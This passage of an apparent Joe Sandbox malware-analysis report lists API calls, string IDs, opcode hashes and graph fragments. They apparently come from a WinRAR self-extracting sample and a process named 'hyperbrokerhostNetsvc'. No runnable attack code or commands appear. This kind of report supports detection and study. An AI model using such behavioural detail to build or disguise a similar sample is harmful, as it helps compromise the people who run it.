                                                                                          • Part of subcall function 00388E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00384286,?,0000015D,?,?,?,?,00385762,000000FF,00000000,?,?), ref: 00388E38
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                        • String ID:
                                                                                        • API String ID: 2652629310-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 0037A666
                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 0037A675
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0037A683
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0037A691
                                                                                        Similarity
                                                                                        • API ID: CapsDevice$Release
                                                                                        • String ID:
                                                                                        • API String ID: 1035833867-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: _wcschr
                                                                                        • String ID: .lnk$d7
                                                                                        • API String ID: 2691759472-501123111
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 003675E3
                                                                                          • Part of subcall function 003705DA: _wcslen.LIBCMT ref: 003705E0
                                                                                          • Part of subcall function 0036A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0036A598
                                                                                        • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0036777F
                                                                                          • Part of subcall function 0036A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0036A325,?,?,?,0036A175,?,00000001,00000000,?,?), ref: 0036A501
                                                                                          • Part of subcall function 0036A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0036A325,?,?,?,0036A175,?,00000001,00000000,?,?), ref: 0036A532
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                                        • String ID: :
                                                                                        • API String ID: 3226429890-336475711
                                                                                        • Opcode ID: d635e1826372bd39b2fa43cfcdb2927d4f8bb8162f58e11fd48476a2e9de408e
                                                                                        • Instruction ID: af77dee9b06b85dac19ec659d013d6712748f5d12c9cc128dc8f72dfdb494042
                                                                                        • Opcode Fuzzy Hash: d635e1826372bd39b2fa43cfcdb2927d4f8bb8162f58e11fd48476a2e9de408e
                                                                                        • Instruction Fuzzy Hash: BF417071800258A9EB36EB64CC55EEEB37CAF45300F40C096B60AAB196DB745F84CF60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: _wcschr
                                                                                        • String ID: *
                                                                                        • API String ID: 2691759472-163128923
                                                                                        • Opcode ID: 9669e8336c5fac09ad68324c46476e9579d21f5b1648ba97caa97e99b34c62ef
                                                                                        • Instruction ID: 32f21c07aa1e3d7bfe33f20ce7763ba7297c14eafeb5ab0b3d0166369af801b1
                                                                                        • Opcode Fuzzy Hash: 9669e8336c5fac09ad68324c46476e9579d21f5b1648ba97caa97e99b34c62ef
                                                                                        • Instruction Fuzzy Hash: 68310B362443019ACA33AE568902677F3E8DF91B50F16C41DF988D714BEF668DC29B61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: _wcslen
                                                                                        • String ID: }
                                                                                        • API String ID: 176396367-4239843852
                                                                                        • Opcode ID: 4e0ae7af32abbcc7c7faea89f3610a6be2924457a7c1504902a4c93dfcc2221b
                                                                                        • Instruction ID: c8ba408154312c8094c68807685e20ad0a75dfb22302ca6dfff685e77ea517e9
                                                                                        • Opcode Fuzzy Hash: 4e0ae7af32abbcc7c7faea89f3610a6be2924457a7c1504902a4c93dfcc2221b
                                                                                        • Instruction Fuzzy Hash: FA21D47290430A5AD733EA64D845F6BF3ECDF82764F11442AF548C7141E778E94883A2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 0036F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0036F2E4
                                                                                          • Part of subcall function 0036F2C5: GetProcAddress.KERNEL32(003A81C8,CryptUnprotectMemory), ref: 0036F2F4
                                                                                        • GetCurrentProcessId.KERNEL32(?,?,?,0036F33E), ref: 0036F3D2
                                                                                        Strings
                                                                                        • CryptUnprotectMemory failed, xrefs: 0036F3CA
                                                                                        • CryptProtectMemory failed, xrefs: 0036F389
                                                                                        Similarity
                                                                                        • API ID: AddressProc$CurrentProcess
                                                                                        • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                        • API String ID: 2190909847-396321323
                                                                                        • Opcode ID: 53f216b874925af24af78f3cfab54cdc0a5c041976ce607a59cb2c294dacb04f
                                                                                        • Instruction ID: 0c164936150de98bf4dd0e09e7e5cd272ecb00d44e67134e0ad36fdcbf56e868
                                                                                        • Opcode Fuzzy Hash: 53f216b874925af24af78f3cfab54cdc0a5c041976ce607a59cb2c294dacb04f
                                                                                        • Instruction Fuzzy Hash: E5112635A01629AFDF139F24EC46A6E3758FF01760F21C126FC416F359DA749D018790
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: _wcschr
                                                                                        • String ID: <99$?*<>|"
                                                                                        • API String ID: 2691759472-236475344
                                                                                        • Opcode ID: 091a04f52ffc0af520d71769fea88d88a79c978119df15c21b3913cf66279e5a
                                                                                        • Instruction ID: 2ee43fba1507d3ad25a6d780a1e9cdad5c42f0e3acbba9ac75588cbdd91e5529
                                                                                        • Opcode Fuzzy Hash: 091a04f52ffc0af520d71769fea88d88a79c978119df15c21b3913cf66279e5a
                                                                                        • Instruction Fuzzy Hash: C0F0A457A69741C5C7322F299801732F3E8EF95734F36A81EE5C5872C6E6A2C8C08665
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: _wcslen
                                                                                        • String ID: Software\WinRAR SFX$7
                                                                                        • API String ID: 176396367-33624352
                                                                                        • Opcode ID: bac4b9d894ea9d4da91fcff80c8bd91b54846b916c65d4b11812561bc0b1b3fc
                                                                                        • Instruction ID: 4edb5e6122842190707c9f1d0d8707a3f723702f4868c434b93280547c3c609a
                                                                                        • Opcode Fuzzy Hash: bac4b9d894ea9d4da91fcff80c8bd91b54846b916c65d4b11812561bc0b1b3fc
                                                                                        • Instruction Fuzzy Hash: B0018432500128BAEF339B51DC09FDF7F7CEF09751F008051B50AA5060D7B45A88C7A1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 0036C29A: _wcslen.LIBCMT ref: 0036C2A2
                                                                                          • Part of subcall function 00371FDD: _wcslen.LIBCMT ref: 00371FE5
                                                                                          • Part of subcall function 00371FDD: _wcslen.LIBCMT ref: 00371FF6
                                                                                          • Part of subcall function 00371FDD: _wcslen.LIBCMT ref: 00372006
                                                                                          • Part of subcall function 00371FDD: _wcslen.LIBCMT ref: 00372014
                                                                                          • Part of subcall function 00371FDD: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0036B371,?,?,00000000,?,?,?), ref: 0037202F
                                                                                          • Part of subcall function 0037AC04: SetCurrentDirectoryW.KERNELBASE(?,0037AE72,C:\Users\user\Desktop,00000000,003A946A,00000006), ref: 0037AC08
                                                                                        • _wcslen.LIBCMT ref: 0037AE8B
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: _wcslen$CompareCurrentDirectoryString
                                                                                        • String ID: <7$C:\Users\user\Desktop
                                                                                        • API String ID: 521417927-3960524650
                                                                                        • Opcode ID: 314fe9394fb4a069537da710946ad18906f96c2d5e2db2fc6e110f3d1e847c5c
                                                                                        • Instruction ID: 046537c110f44156d380ccd3cce8e4bcfa0ab97fb62549820d72bfa00a3f5065
                                                                                        • Opcode Fuzzy Hash: 314fe9394fb4a069537da710946ad18906f96c2d5e2db2fc6e110f3d1e847c5c
                                                                                        • Instruction Fuzzy Hash: 1E015271D00219A5DF23ABA4DD0AEDE72FCAF0D700F004456F609E7191E6B896448BA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 003897E5: GetLastError.KERNEL32(?,003A1098,00384674,003A1098,?,?,003840EF,?,?,003A1098), ref: 003897E9
                                                                                          • Part of subcall function 003897E5: _free.LIBCMT ref: 0038981C
                                                                                          • Part of subcall function 003897E5: SetLastError.KERNEL32(00000000,?,003A1098), ref: 0038985D
                                                                                          • Part of subcall function 003897E5: _abort.LIBCMT ref: 00389863
                                                                                        • _abort.LIBCMT ref: 0038BB80
                                                                                        • _free.LIBCMT ref: 0038BBB4
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: ErrorLast_abort_free
                                                                                        • String ID: p9
                                                                                        • API String ID: 289325740-1904256876
                                                                                        • Opcode ID: e6f9a7039994d61314dabde3296f8e42647ef126814fc1634bb19c96b9ac2ebf
                                                                                        • Instruction ID: 8af0abf776e1d9bcefee598523577d213c433a441a7aa2b484288e20b6476298
                                                                                        • Opcode Fuzzy Hash: e6f9a7039994d61314dabde3296f8e42647ef126814fc1634bb19c96b9ac2ebf
                                                                                        • Instruction Fuzzy Hash: 4C018071D01B22DBCB23FF69840162DF7A5BF04B20B1A019AE8646B295CB756D018FC1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: Malloc
                                                                                        • String ID: (7$Z7
                                                                                        • API String ID: 2696272793-1636684695
                                                                                        • Opcode ID: 7993f3633ab03731d17ec0132c64a0c8d8142bacdc0f416e26aba7589ca57c8f
                                                                                        • Instruction ID: 704c36b0d40ca1d23c087077411247891e9e9a0cb014fb91f80dfbf4061a1757
                                                                                        • Opcode Fuzzy Hash: 7993f3633ab03731d17ec0132c64a0c8d8142bacdc0f416e26aba7589ca57c8f
                                                                                        • Instruction Fuzzy Hash: 2801E4B6640119BF9F069FA1DD49CAEBBBDEF08344B108159B906D7120E631AA44DBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 0038BF30: GetEnvironmentStringsW.KERNEL32 ref: 0038BF39
                                                                                          • Part of subcall function 0038BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0038BF5C
                                                                                          • Part of subcall function 0038BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0038BF82
                                                                                          • Part of subcall function 0038BF30: _free.LIBCMT ref: 0038BF95
                                                                                          • Part of subcall function 0038BF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0038BFA4
                                                                                        • _free.LIBCMT ref: 003882AE
                                                                                        • _free.LIBCMT ref: 003882B5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                                                        • String ID: 0"<
                                                                                        • API String ID: 400815659-1408697893
                                                                                        • Opcode ID: 42dfa383a465bdd28affc9e84fab505774441cb54ce13ecad444b25ddfb2999c
                                                                                        • Instruction ID: d43d7998bbae99f109b1947f12511610b6e2628786b1e6c23e773b13fbc0dd71
                                                                                        • Opcode Fuzzy Hash: 42dfa383a465bdd28affc9e84fab505774441cb54ce13ecad444b25ddfb2999c
                                                                                        • Instruction Fuzzy Hash: 3FE0E523605F4245D2A333792C02F6B06094FC1338BA50EDAF910DE1D3CE50880307A2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,00371101,?,?,0037117F,?,?,?,?,?,00371169), ref: 00370FEA
                                                                                        • GetLastError.KERNEL32(?,?,0037117F,?,?,?,?,?,00371169), ref: 00370FF6
                                                                                          • Part of subcall function 00366C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00366C54
                                                                                        Strings
                                                                                        • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00370FFF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                        • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                        • API String ID: 1091760877-2248577382
                                                                                        • Opcode ID: 9062c21a788b6cc4f771356476503d9144bd0e9e2ee2c5d61e924fe5d1ca3847
                                                                                        • Instruction ID: c51c6b1530d51d359f0886f6d17d918585e578af6cb6d4f58353dcf3c2951199
                                                                                        • Opcode Fuzzy Hash: 9062c21a788b6cc4f771356476503d9144bd0e9e2ee2c5d61e924fe5d1ca3847
                                                                                        • Instruction Fuzzy Hash: 0FD05B7650493076C62333386C47DAF3908DB52771F514715F139652E5CA154D915691
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,0036DA55,?), ref: 0036E2A3
                                                                                        • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0036DA55,?), ref: 0036E2B1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: FindHandleModuleResource
                                                                                        • String ID: RTL
                                                                                        • API String ID: 3537982541-834975271
                                                                                        • Opcode ID: 23abb74c540e8fb215822df353a727a5742581abe4abbb156ac92823ea3c8a70
                                                                                        • Instruction ID: 0faca84771c2bb662c496ba56b0ee9b9174fc53d9d0639cc596d1385e7458fc2
                                                                                        • Opcode Fuzzy Hash: 23abb74c540e8fb215822df353a727a5742581abe4abbb156ac92823ea3c8a70
                                                                                        • Instruction Fuzzy Hash: 1FC0807124071066EB3227747C0DF836E5C9B01B15F05044DF142E93D1D6E7C944C7E0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E467
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: p7$z7
                                                                                        • API String ID: 1269201914-1647427826
                                                                                        • Opcode ID: a0722e21fa3892017704a3a83a622334591e04b59abdb66e2de60b594b5f99ae
                                                                                        • Instruction ID: c94ea8b97e8df488469b5a13f293d2929d8f7977068e158cc949e9e28d8901bf
                                                                                        • Opcode Fuzzy Hash: a0722e21fa3892017704a3a83a622334591e04b59abdb66e2de60b594b5f99ae
                                                                                        • Instruction Fuzzy Hash: 17B012C62A9040BC3257A1151C02E37015CC0C8F50330D06EF83DC4481DC484C000533
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E467
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: U7$z7
                                                                                        • API String ID: 1269201914-2516247399
                                                                                        • Opcode ID: c8d23bc62ec54a5a05e37811d936ea38a8da06823c66d2359304b5a557e62184
                                                                                        • Instruction ID: 574b132cf9873de47f0fc79d9deb62df0cf0af95fa764a257c2991338b786b76
                                                                                        • Opcode Fuzzy Hash: c8d23bc62ec54a5a05e37811d936ea38a8da06823c66d2359304b5a557e62184
                                                                                        • Instruction Fuzzy Hash: 22B012D62680007C321711111D02D37021CC0C4F10330D06EF639C4481DC4C0E010433
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Execution Graph

                                                                                        Execution Coverage:3.7%
                                                                                        Dynamic/Decrypted Code Coverage:75%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:12
                                                                                        Total number of Limit Nodes:0
                                                                                        execution_graph 16146 7ffd9bc4c1bd 16147 7ffd9bc4c1cb SuspendThread 16146->16147 16149 7ffd9bc4c2a4 16147->16149 16154 7ffd9bc4d960 16155 7ffd9bc4d99b ResumeThread 16154->16155 16157 7ffd9bc4da74 16155->16157 16150 7ffd9bc4dac9 16151 7ffd9bc4dad7 FindCloseChangeNotification 16150->16151 16153 7ffd9bc4dbb4 16151->16153 16158 7ffd9bc4f7e5 16159 7ffd9bc4f7ff GetFileAttributesW 16158->16159 16161 7ffd9bc4f8c5 16159->16161

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 295 7ffd9baa0da7-7ffd9baa0db7 296 7ffd9baa0dba-7ffd9baa0df9 295->296 297 7ffd9baa0db9 295->297 299 7ffd9baa0dfb 296->299 300 7ffd9baa0e00-7ffd9baa0eb7 call 7ffd9baa07c8 296->300 297->296 299->300 313 7ffd9baa0eb9-7ffd9baa0ece 300->313 314 7ffd9baa0ecf-7ffd9baa0fa8 300->314 313->314 327 7ffd9baa0faa-7ffd9baa0fbe 314->327 328 7ffd9baa0fc0-7ffd9baa0fe3 314->328 327->328 332 7ffd9baa0feb-7ffd9baa10dc 328->332
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1932757306.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ffd9baa0000_hyperbrokerhostNetsvc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 21f4da2bb07cb0d7e4244bbd012c1a78ac99b1976f86c53606d8b994037c5edd
                                                                                        • Instruction ID: 1561f2199255fe00cd45b4c51c109920fdbf8c01a52a1efc644109e13248b09e
                                                                                        • Opcode Fuzzy Hash: 21f4da2bb07cb0d7e4244bbd012c1a78ac99b1976f86c53606d8b994037c5edd
                                                                                        • Instruction Fuzzy Hash: 6CA1DEB1A1994D8FE7A8DB68C8657AD7BE1FF99310F0002BAD00DD72D6DBB41805C750
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1934851250.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ffd9bc40000_hyperbrokerhostNetsvc.jbxd
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID:
                                                                                        • API String ID: 947044025-0
                                                                                        • Opcode ID: 555d51141c5db86268d8ae96c9d6b16177ab121d35c32442689755b054aeedc8
                                                                                        • Instruction ID: 8953c6acf4c6b5c657014f712f050e19992a39b971c0d023e57ef1e5f26aea37
                                                                                        • Opcode Fuzzy Hash: 555d51141c5db86268d8ae96c9d6b16177ab121d35c32442689755b054aeedc8
                                                                                        • Instruction Fuzzy Hash: 06517A7090C78C8FDB59EFA8D894BE9BBF0EF56310F1441ABD049DB292DA749946CB01
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1934851250.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ffd9bc40000_hyperbrokerhostNetsvc.jbxd
                                                                                        Similarity
                                                                                        • API ID: ChangeCloseFindNotification
                                                                                        • String ID:
                                                                                        • API String ID: 2591292051-0
                                                                                        • Opcode ID: 1c4a06b8716eca866b53bdec78827c66b292c6b966d7b1234f2c005442755967
                                                                                        • Instruction ID: f4d0ee3fc29203a6211fdc554c692196c7f81efa6443b278c31774e8c7c0c3a6
                                                                                        • Opcode Fuzzy Hash: 1c4a06b8716eca866b53bdec78827c66b292c6b966d7b1234f2c005442755967
                                                                                        • Instruction Fuzzy Hash: 8B415B30E0865C8FDB58DFA8D895BEDBBF0FF5A310F1041AAD049D7292DA74A985CB41
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 22 7ffd9bc4c1bd-7ffd9bc4c1c9 23 7ffd9bc4c1d4-7ffd9bc4c2a2 SuspendThread 22->23 24 7ffd9bc4c1cb-7ffd9bc4c1d3 22->24 28 7ffd9bc4c2a4 23->28 29 7ffd9bc4c2aa-7ffd9bc4c2f4 23->29 24->23 28->29
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1934851250.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ffd9bc40000_hyperbrokerhostNetsvc.jbxd
                                                                                        Similarity
                                                                                        • API ID: SuspendThread
                                                                                        • String ID:
                                                                                        • API String ID: 3178671153-0
                                                                                        • Opcode ID: f56a86ade5d026d775c680a65857e0b16aadeb0c3413414441efe0bcb5673514
                                                                                        • Instruction ID: 6e5fd9f0944486eee5cdb762805af6cfe4d60633fc1fbfc8cb599d84a2e5bdac
                                                                                        • Opcode Fuzzy Hash: f56a86ade5d026d775c680a65857e0b16aadeb0c3413414441efe0bcb5673514
                                                                                        • Instruction Fuzzy Hash: 86414970E0864C8FDB98DFA8C895AEDBBF0FF5A311F10416AD449E7292DA71A945CF40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 32 7ffd9bc4f7e5-7ffd9bc4f8c3 GetFileAttributesW 36 7ffd9bc4f8cb-7ffd9bc4f909 32->36 37 7ffd9bc4f8c5 32->37 37->36
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1934851250.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ffd9bc40000_hyperbrokerhostNetsvc.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesFile
                                                                                        • String ID:
                                                                                        • API String ID: 3188754299-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1932757306.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ffd9baa0000_hyperbrokerhostNetsvc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: M
                                                                                        • API String ID: 0-3664761504
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1940308305.00007FFD9C170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C170000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ffd9c170000_hyperbrokerhostNetsvc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1940308305.00007FFD9C170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C170000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ffd9c170000_hyperbrokerhostNetsvc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1932757306.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ffd9baa0000_hyperbrokerhostNetsvc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
